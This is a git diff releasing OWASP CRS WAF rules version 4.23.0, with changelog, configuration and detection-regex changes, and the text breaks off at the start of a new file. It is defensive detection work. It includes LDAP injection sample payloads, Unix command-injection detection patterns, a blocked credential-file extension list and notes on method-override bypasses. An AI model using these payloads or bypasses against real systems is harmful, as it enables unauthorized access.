diff --git a/.github/workflows/duty-scheduler.yaml b/.github/workflows/duty-scheduler.yaml index 6677189198..29d077c913 100644 --- a/.github/workflows/duty-scheduler.yaml +++ b/.github/workflows/duty-scheduler.yaml @@ -11,6 +11,7 @@ permissions: {} jobs: duty-report: runs-on: ubuntu-latest + if: github.repository == 'coreruleset/coreruleset' permissions: contents: write steps: diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml index 25af5fcbd2..db88ae1a05 100644 --- a/.github/workflows/lint.yaml +++ b/.github/workflows/lint.yaml @@ -17,7 +17,7 @@ on: env: CRS_TOOLCHAIN_VERSION: '2.6.0' SECRULES_PARSING_VERSION: '0.2.12' - CRS_LINTER_VERSION: '0.2.2' + CRS_LINTER_VERSION: '1.0.0' jobs: check-syntax: @@ -26,8 +26,7 @@ jobs: - name: Checkout repo uses: actions/checkout@1af3b93b6815bc44a9784bd300feb67ff0d1eeb3 # v6.0.0 with: - # required for version detection using `git describe` - fetch-depth: 50 + fetch-depth: 0 - name: Lint Yaml uses: ibiqlik/action-yamllint@2576378a8e339169678f9939646ee3ee325e845c # v3.1.1 diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml index 13136db467..32c75641ec 100644 --- a/.github/workflows/stale.yml +++ b/.github/workflows/stale.yml @@ -8,13 +8,14 @@ jobs: stale: runs-on: ubuntu-latest + if: github.repository == 'coreruleset/coreruleset' steps: - uses: actions/stale@28ca1036281a5e5922ead5184a1bbf96e5fc984e # v9.0.0 with: repo-token: ${{ secrets.GITHUB_TOKEN }} - stale-issue-message: 'This issue has been open 30 days waiting for feedback. Remove the stale label or comment, or this will be closed in 14 days' + stale-issue-message: 'This issue has been open 45 days waiting for feedback. Remove the stale label or comment, or this will be closed in 30 days' stale-issue-label: 'Stale issue' - days-before-stale: 30 - days-before-close: 14 + days-before-stale: 45 + days-before-close: 30 only-issue-labels: ':hourglass_flowing_sand: awaiting feedback' diff --git a/.gitignore b/.gitignore index 1c073edd82..b5f1f07a48 100644 --- a/.gitignore +++ b/.gitignore @@ -32,3 +32,4 @@ tests/.env # Ignore Go-FTW configuration file .ftw.yaml +crs-toolchain diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index 7017879f5e..51f51c5423 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -20,7 +20,7 @@ repos: exclude: '^regex-assembly/' args: [--markdown-linebreak-ext=md] - repo: https://github.com/adrienverge/yamllint.git - rev: v1.37.1 + rev: v1.38.0 hooks: - id: yamllint args: [-f=github, -c=.yamllint.yml] diff --git a/CHANGES.md b/CHANGES.md index 698615706d..f5e763ed7f 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -5,6 +5,49 @@ or the CRS Google Group at * https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project +## Version 4.23.0 - 2026-03-04 + +## What's Changed +### ⭐ Important changes +* feat(920640): add rule to enforce content-type if there is body by @fzipi in https://github.com/coreruleset/coreruleset/pull/4406 +### 🆕 New features and detections 🎉 +* feat(lfi): Add detection for Vite.js path traversal (CVE-2025-30208) by @disisto in https://github.com/coreruleset/coreruleset/pull/4407 +* feat: block fake `mozilla/5.g` user-agent by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4383 +* feat: resolve common false positives with ad and tracker cookies by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4378 +* fix(ssrf): catch malformed urls by @fzipi in https://github.com/coreruleset/coreruleset/pull/4410 +* feat: block 'trap' command by @azurit in https://github.com/coreruleset/coreruleset/pull/4422 +* feat: prevent php session files to be uploaded by @fzipi in https://github.com/coreruleset/coreruleset/pull/4412 +* feat(930130): improvement of the detection of common debug or error files across CMS platforms by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4426 +* feat(942450): add another hex + binary declaration pattern by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4374 +* feat: update restricted files and file extensions by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4299 +* feat(920650): add detection for framework method overrides by @fzipi in https://github.com/coreruleset/coreruleset/pull/4416 +* fix: remove Request-Range Header from rules by @Xhoenix in https://github.com/coreruleset/coreruleset/pull/4435 +* feat: block when Request-Range header is used by @fzipi in https://github.com/coreruleset/coreruleset/pull/4436 +### 🧰 Other Changes +* fix: remove bypass-vulnerable content types from default allow lists by @RedXanadu in https://github.com/coreruleset/coreruleset/pull/4365 +* feat(931131): removing off domain check by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4379 +* chore(933120): cleaning obsolete variable by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4417 +* chore(941360,941370,941380): cleaning useless capture keyword by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4419 +* chore(933151,933152,933153): cleaning useless variables by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4420 +* feat(942350): added replace keyword + c-type comment evasion by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4373 +* fix(933111): regex should be the same as 933110 by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4395 +* fix: FPs related to maxDB information leakage by @azurit in https://github.com/coreruleset/coreruleset/pull/4382 +* fix: remove non-unix commands from unix rce rules (932230 PL-1, 932235 PL-1, 932250 PL-1, 932260 PL-1, 932220 PL-2, 932236 PL-2, 932239 PL-2, 932237 PL-3) by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4247 +* fix(941120): new regex is eligible for Paranoia Level 1 by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4291 +* fix(933150): reduce substring false positive matches by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4340 +* fix(942410): cleaning of duplicates with 942151 by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4336 +* fix: add separate rule to match unix commands with no arguments by @EsadCetiner in https://github.com/coreruleset/coreruleset/pull/4273 +* fix(934140): update perl interpolation regex by @fzipi in https://github.com/coreruleset/coreruleset/pull/4250 +* feat(921200): move regexp to regex-assembly by @fzipi in https://github.com/coreruleset/coreruleset/pull/4409 +* fix(934190): add new rule to check localhost variants without scheme by @fzipi in https://github.com/coreruleset/coreruleset/pull/4429 +* feat(941110): all HTTP headers should be checked by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4326 +* feat(941120): all HTTP headers should be checked by @touchweb-vincent in https://github.com/coreruleset/coreruleset/pull/4327 + +## New Contributors +* @disisto made their first contribution in https://github.com/coreruleset/coreruleset/pull/4407 + +**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.22.0...v4.23.0 + ## Version 4.22.0 - 2026-01-05 ## What's Changed diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md index 8bbedaa146..eb7a415dad 100644 --- a/CONTRIBUTORS.md +++ b/CONTRIBUTORS.md @@ -30,6 +30,7 @@ ## Contributors: +- [disisto](https://github.com/disisto) - [touchweb-vincent](https://github.com/touchweb-vincent) - [Elnadrion](https://github.com/Elnadrion) - [pha6d](https://github.com/pha6d) diff --git a/SECURITY.md b/SECURITY.md index 10c0813a26..25f99f6a7c 100644 --- a/SECURITY.md +++ b/SECURITY.md @@ -11,8 +11,8 @@ Along those lines, OWASP CRS team may not issue security notifications for unsup | Version | Supported | | --------- | ------------------ | +| 4.23.z | :white_check_mark: | | 4.22.z | :white_check_mark: | -| 4.21.z | :white_check_mark: | | 4.y.z | :x: | | 3.3.x | :white_check_mark: | | 3.2.x | :x: | diff --git a/crs-setup.conf.example b/crs-setup.conf.example index a3831fe0c7..6b8d46cc7f 100644 --- a/crs-setup.conf.example +++ b/crs-setup.conf.example @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -181,7 +181,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.blocking_paranoia_level=1" @@ -209,7 +209,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.detection_paranoia_level=1" @@ -235,7 +235,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.enforce_bodyproc_urlencoded=1" @@ -270,7 +270,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.critical_anomaly_score=5,\ # setvar:tx.error_anomaly_score=4,\ # setvar:tx.warning_anomaly_score=3,\ @@ -324,7 +324,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.inbound_anomaly_score_threshold=5,\ # setvar:tx.outbound_anomaly_score_threshold=4" @@ -385,7 +385,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.reporting_level=4" @@ -417,7 +417,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.early_blocking=1" @@ -438,7 +438,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.enable_default_collections=1" @@ -476,12 +476,42 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" +# +# -- [[ HTTP Method Override Parameter ]] ------------------------------------- +# +# Many web frameworks (Laravel, Rails, Symfony, CakePHP, Express.js, etc.) +# support overriding the HTTP method via a _method parameter in the query +# string or request body. This allows HTML forms to simulate PUT, PATCH, +# and DELETE requests. +# +# While this is legitimate framework behavior, it can be abused for: +# - WAF bypass (sending POST with _method=DELETE) +# - CSRF attacks bypassing SameSite=Lax cookie restrictions +# - Method-based ACL bypass +# +# By default, CRS blocks _method parameter usage at PL2+. If your application +# legitimately uses the _method parameter for method override, you can allow +# it by uncommenting the rule below. +# +# Note: The X-HTTP-Method-Override header is handled separately by rule 920450. +# +# Uncomment this rule to ALLOW _method parameter for method override: +# +#SecAction \ +# "id:900210,\ +# phase:1,\ +# pass,\ +# nolog,\ +# tag:'OWASP_CRS',\ +# ver:'OWASP_CRS/4.23.0',\ +# setvar:'tx.allow_method_override_parameter=1'" + # Content-Types that a client is allowed to send in a request. # Default: |application/x-www-form-urlencoded| |multipart/form-data| |text/xml| -# |application/xml| |application/soap+xml| |application/json| |application/reports+json| |application/csp-report| +# |application/xml| |application/soap+xml| |application/json| # # Please note, that the rule where CRS uses this variable (920420) evaluates it with operator # `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom @@ -516,7 +546,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # chain" # SecRule REQUEST_URI "@rx ^/foo/bar" \ # "t:none,\ @@ -535,8 +565,8 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ -# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/reports+json| |application/csp-report|'" +# ver:'OWASP_CRS/4.23.0',\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json|'" # Allowed HTTP versions. # Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0 @@ -551,12 +581,12 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Forbidden file extensions. # Guards against unintended exposure of development/configuration files. -# Default: .ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swp/ .sys/ .temp/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/ +# Default: .ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/ # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ # Note that .axd was removed due to false positives (see PR 1925). # @@ -575,8 +605,8 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ -# setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swp/ .sys/ .temp/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" +# ver:'OWASP_CRS/4.23.0',\ +# setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .back/ .backup/ .bak/ .bck/ .bk/ .bkp/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .cnf/ .com/ .compositefont/ .config/ .conf/ .copy/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jks/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .sav/ .save/ .scr/ .sct/ .sh/ .shs/ .sql/ .sqlite/ .sqlite3/ .swap/ .swo/ .swp/ .sys/ .temp/ .tfstate/ .tlb/ .tmp/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'" # Restricted request headers. # The HTTP request headers that CRS restricts are split into two categories: @@ -631,7 +661,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/ /expect/'" # # [ Extended ] @@ -657,7 +687,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.restricted_headers_extended=/accept-charset/'" # Content-Types charsets that a client is allowed to send in a request. @@ -676,7 +706,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" # @@ -702,7 +732,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.max_num_args=255" # Block request if the length of any argument name is too high @@ -716,7 +746,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.arg_name_length=100" # Block request if the length of any argument value is too high @@ -730,7 +760,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.arg_length=400" # Block request if the total length of all combined arguments is too high @@ -744,7 +774,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.total_arg_length=64000" # Block request if the file size of any individual uploaded file is too high @@ -758,7 +788,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.max_file_size=1048576" # Block request if the total size of all combined uploaded files is too high @@ -772,7 +802,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.combined_file_sizes=1048576" @@ -812,7 +842,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # pass,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.sampling_percentage=100" @@ -833,7 +863,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.crs_validate_utf8_encoding=1" # -- [[ Skip Checking Responses ]] ------------------------------------------------ @@ -855,7 +885,7 @@ SecDefaultAction "phase:2,log,auditlog,pass" # t:none,\ # nolog,\ # tag:'OWASP_CRS',\ -# ver:'OWASP_CRS/4.22.0',\ +# ver:'OWASP_CRS/4.23.0',\ # setvar:tx.crs_skip_response_analysis=1" # @@ -876,5 +906,5 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ - setvar:tx.crs_setup_version=4220" + ver:'OWASP_CRS/4.23.0',\ + setvar:tx.crs_setup_version=4230" diff --git a/regex-assembly/921200.ra b/regex-assembly/921200.ra new file mode 100644 index 0000000000..1e62353635 --- /dev/null +++ b/regex-assembly/921200.ra @@ -0,0 +1,77 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! -=[ LDAP Injection ]=- +##! +##! This rule attempts to detect LDAP injection attacks. +##! It is based on a BlackHat presentation by Alonso Parada +##! and regex writing by Denis Kolegov. +##! +##! References: +##! * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf +##! * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ +##! * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 +##! +##! LDAP filter syntax (RFC 4515): +##! filter = "(" filtercomp ")" +##! filtercomp = and / or / not / item +##! and = "&" filterlist +##! or = "|" filterlist +##! not = "!" filter +##! filterlist = 1*filter +##! item = simple / present / substring / extensible +##! simple = attr filtertype assertionvalue +##! filtertype = equal / approx / greaterorequal / lessorequal +##! equal = "=" +##! approx = "~=" +##! greaterorequal = ">=" +##! lessorequal = "<=" +##! +##! Attack patterns detected: +##! 1. Closing parenthesis followed by filter opening: )(... +##! 2. Boolean operator injection: &, |, ! operators +##! 3. Filter attribute manipulation with comparison operators: attr>=, attr<=, attr~= +##! +##! The regex detects attempts to break out of LDAP filter context by: +##! - Injecting closing parenthesis followed by new filter constructs +##! - Injecting boolean operators (&, |, !) to modify filter logic +##! - Injecting comparison operators (=, >=, <=, ~=) with attributes + +##! Character class definitions for LDAP special characters +##! Note: Using \x3c for < and \x3e for > to prevent invalid range issues +##! when the assembler reorders characters (< = 0x3c, = = 0x3d, > = 0x3e) +##! Template variable definitions ({{...}}) do NOT work in prefix/suffix markers; +##! those markers are literal with respect to {{define}} substitution, but standard +##! regex escape sequences (such as \x3c and \x3e) still apply. +##! +##! Different positions in the original regex used different character sets: +##! - ldap-prefix-chars: excludes colon (:) and special chars, but NOT comma (used in prefix and pattern 3 suffix) +##! - ldap-pattern-chars: excludes comma (,) and equals (=), but NOT colon (used in patterns 1 and 3) +##!> define ldap-prefix-chars :\(\)&\|\!\x3c\x3e~ +##!> define ldap-pattern-chars ,=\(\)&\|\!\x3c\x3e~ +##!> define ldap-bool-ops &!\| +##!> define comparison-prefix \x3c\x3e~ + +##! Prefix: Match any characters that are NOT LDAP special characters at the start, +##! followed by a closing parenthesis. This represents breaking out of a filter value. +##! Note: Must be literal here with respect to {{define}} substitutions, as template +##! variables cannot be used in the prefix marker (but normal regex escapes can) +##! ldap-prefix-chars = : ( ) & | ! < > ~ (NO comma) +##!^ ^[^:\(\)&\|\!\x3c\x3e~]*\)\s* + +##! Pattern 1: Opening parenthesis followed by either: +##! a) An attribute name followed by optional comparison modifier and equals sign +##! b) Whitespace and boolean operator with optional parenthesis +##! Example attacks: )(uid=*, )(&(objectClass=*), )(|(cn=admin +##! Uses ldap-pattern-chars which excludes: , ( ) = & | ! < > ~ (NO colon) +\((?:[^{{ldap-pattern-chars}}]+[{{comparison-prefix}}]?=|\s*[{{ldap-bool-ops}}]\s*[\(\)]?\s*) + +##! Pattern 2: Closing parenthesis followed by opening parenthesis with boolean operator +##! Example attacks: ))((&, ))((|, ))((! +\)\s*\(\s*[{{ldap-bool-ops}}]\s* + +##! Pattern 3: Boolean operator followed by opening parenthesis and attribute with comparison +##! Example attacks: &(uid>=admin, |(cn<=test, !(sn~=value +##! First char class uses ldap-pattern-chars (excludes comma, NOT colon) +##! Second char class uses ldap-prefix-chars (excludes colon, NOT comma) +[{{ldap-bool-ops}}]\s*\([^{{ldap-pattern-chars}}]+[{{comparison-prefix}}]?=[^{{ldap-prefix-chars}}]* diff --git a/regex-assembly/932235.ra b/regex-assembly/932235.ra index 5be5f0dc65..905816867d 100644 --- a/regex-assembly/932235.ra +++ b/regex-assembly/932235.ra @@ -8,4 +8,4 @@ ##! These patterns are approximations of the patterns used by the cmdline ##! processor for `@` and `~`. ##! These patterns are used across multiple files, change with care. -##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b +##!> include-except unix-shell-4andup unix-shell-fps-pl1-curated -- @ [\s<>&|),] ~ \S{1,10}\b diff --git a/regex-assembly/932236.ra b/regex-assembly/932236.ra index eb3ed2fdb3..15afc495df 100644 --- a/regex-assembly/932236.ra +++ b/regex-assembly/932236.ra @@ -11,5 +11,5 @@ ##! These patterns are approximations of the patterns used by the cmdline ##! processor for `@` and `~`. ##! These patterns are used across multiple files, change with care. -##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b -##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|),] ~ \S{1,10}\b +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string -- @ [\s<>&|),] ~ \S{1,10}\b diff --git a/regex-assembly/932237.ra b/regex-assembly/932237.ra index d676d02b83..f504eafd91 100644 --- a/regex-assembly/932237.ra +++ b/regex-assembly/932237.ra @@ -10,6 +10,6 @@ ##! These patterns are approximations of the patterns used by the cmdline ##! processor for `@` and `~`. ##! These patterns are used across multiple files, change with care. -##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b -##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b -##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b +##!> include-except unix-shell-upto3 unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b +##!> include-except unix-shell-4andup unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b +##!> include-except unix-shell-pl3 unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b diff --git a/regex-assembly/932239.ra b/regex-assembly/932239.ra index 67cdb604c8..a23e5d6c09 100644 --- a/regex-assembly/932239.ra +++ b/regex-assembly/932239.ra @@ -11,5 +11,5 @@ ##! These patterns are approximations of the patterns used by the cmdline ##! processor for `@` and `~`. ##! These patterns are used across multiple files, change with care. -##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b -##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b +##!> include-except unix-shell-upto3 unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b +##!> include-except unix-shell-4andup unix-shell-fps-pl2 unix-shell-fps-pl2-start-of-string unix-shell-fps-useragents -- @ [\s<>&|),] ~ \S{1,10}\b diff --git a/regex-assembly/932260.ra b/regex-assembly/932260.ra index a30aee5193..c4f1994a5e 100644 --- a/regex-assembly/932260.ra +++ b/regex-assembly/932260.ra @@ -11,5 +11,5 @@ ##! These patterns are approximations of the patterns used by the cmdline ##! processor for `@` and `~`. ##! These patterns are used across multiple files, change with care. - ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ (?:[\s<>&|),]|$) ~ \S{1,10}\b + ##!> include-except unix-shell-4andup unix-shell-fps-pl1 -- @ [\s<>&|),] ~ \S{1,10}\b ##!< diff --git a/regex-assembly/932340.ra b/regex-assembly/932340.ra new file mode 100644 index 0000000000..2a0deec01c --- /dev/null +++ b/regex-assembly/932340.ra @@ -0,0 +1,17 @@ +##! Please refer to the documentation at +##! 